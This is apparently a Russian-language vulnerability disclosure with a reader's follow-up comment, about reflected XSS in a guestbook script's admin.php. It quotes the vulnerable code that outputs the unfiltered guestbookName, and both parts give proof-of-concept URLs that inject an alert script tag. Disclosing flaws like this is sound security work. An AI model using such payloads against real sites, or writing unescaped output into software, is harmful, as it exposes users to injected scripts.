Из-за отсутствия фильтрации большинтсва параметров в скрипте admin.php становится возможной реализация XSS нападения. Пример бажного кода admin.php: $guestbookName=GUESTBOOK_NAME; ..... <td></td><td><a href="http://purpleyin.com"><p style="font-weight:bold;color:#FFFFFF;">$guestbookName</p></a></td> Значение константы GUESTBOOK_NAME присваивается переменной $guestbookNamе, при этом сама константа не определена. Proof of concept: http://site.com/guestbook/admin.php?guestbookName="><script>alert(/XSS/)</script> Кроме этого уязвимы почти все остальные параметры данного скрипта. Видимо, создатели посчитали, что скрипт admin.php будет просматривать только админ. P. S. Работает в Internet Explorer
Может, я чего-то не догоняю, но если заходить по адресу http://site.com/guestbook/admin.php?guestbookName="><script>alert(/XSS/)</script> то это преобразуется в <td></td><td><a href="http://purpleyin.com"><p style="font-weight:bold;color:#FFFFFF;">"><script>alert(/XSS/)</script></p></a></td> Может, можно обойтись http://site.com/guestbook/admin.php?guestbookName=<script>alert(/XSS/)</script> ? Сорри, если чего недопонял, и просьба хотя бы ткнуть носом в то место, которое я не понял..